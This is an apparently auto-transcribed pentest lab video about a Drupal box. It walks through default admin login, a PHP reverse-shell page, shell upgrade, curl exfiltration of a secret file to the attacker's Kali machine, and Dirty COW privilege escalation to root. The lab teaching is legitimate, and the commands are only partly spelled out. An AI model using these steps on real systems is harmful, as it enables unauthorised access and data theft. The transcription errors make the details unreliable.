21 hours 43 minutes
Welcome to the file transfer lab demo. You can see I'm in a droop als site here. You can tell that because it's just powered by Drew Apple and also because a little dribble logo here. So sometimes it's as easy as guessing. So I'm going to do admin admin
and you can see I logged in as admin. Hello admin.
So what I want to do now, this is just getting to know content management systems. What I want to do with content is I want to add content
at a basic page.
I'm going to call this shell dot PHP
and I'm going to change this to PHP code
now. I need to figure out what shall I want to use. Well obviously we know it's PHP. You can see this is that said I was telling you about reb shells dot com.
I've already picked the pen test monkey show. I like this show.
And what you do is I've just added my I. P address and the port number.
It actually tells you what to do in your box here for the listener.
And I've changed my shell from the default been S. H. Two bin bash because I like bash shells better.
It's gonna copy this. I'm going to paste it here.
So what I need to get ready is I need to get a listener ready.
An LEP 4444.
And we'll save this
we see if I hit preview.
Now I have my shell here. Dub dub, dub data. You can see this is no control job in shell. So let's have one to sue. Route.
It says must be run from a terminal. So now we know we have what I call a bad shell.
How do we make this a nicer shell?
So I told you about python, taxi, import P. T. Y.
Let's do that.
But you can see this has been S. H.
I like bash better but I'll show you what happens if you do Ben Shell.
So you just get the little dollar sign and not the nicer output.
You can of course change this
to bin bash
and there you go. Now if I wanted to sue route
now I asked me the password, obviously I don't know the root user's password.
So typically I'll go and figure out
is in here. And I see this Triple Pro which which users are in here I should say remember Cat at sea
at sea password.
And I see Drew Apple Pro.
So I'll change director to Drew People
And then I'll see what files are in here. And I see this something called secret,
let's say when I get that file onto my Cali box,
what I'll do is I'll split my terminal vertically.
And I'm gonna use that simply should be put server. I told you I'll show you what it looks like a cat. It
it's a very small script. But I can now put things onto my Cali box. Whereas if I just did simple HDP server or HTTP server with python three, I can't put things onto my machine.
So let's do
python python two
And it's on 48,000.
So what I'll do on this size curl tete big t
. And then my Cali box 1921681
And you can see that. I gotta crow request here.
And if I check my desktop
we can x. Out of here. Now
I see that I get secret
So I put that on from from the dribble machine onto my machine with that server.
Now what I can do
is I can try to put a file from Cali onto this machine and if I do you name a, I see a kernel version and we'll talk about this morning in colonel exploits
but I know that this is vulnerable to dirty cow
as you can see already have dirty cow down here.
So typically what I do is go to the temp directory because I know it's globally readable, writable and execute Herbal
and I'll use curl http 1921681228 8000.
Remember this is on the desktop and dirty cows on the desktop. Dirty
cow dot c
you can even whatever I want. Dirty see
and now I see to get requests on the right
and I see that that was downloaded.
So if I open this, I said I like to look at the comments.
It should tell me how to compile it. So I see here G ccP thread dirty. See output. Dirty.
So I'll try that here
and um ahmad plus X.
and then I will
and our new password
and you can see it should have overwritten
the etc. Password file to have this fire fart user
in it as as the root user.
So some sometimes you'll notice that um, you may not get an output with these, these colonel exploits. There we go. Now we see something.
Great. So now we see that it's done check etc. Pastor to see if the new user was created.
So now I can do sue. Fire,
and my password of fire.
And now we see I am the root user.
So that gives you some idea of how I both get files. I mean I showed you many examples. This is that was just one was setting up that simple http. Put server. But you saw how I could put files onto my machine.
You saw how I transferred from a bad shell where I couldn't use su
to using python and importing P. T. Y.
And then curling and getting the exploit onto the victim machine and ultimately being able to execute it and becoming the root user, which we'll talk about a lot more in the next module for privilege escalation. So I will see you for that.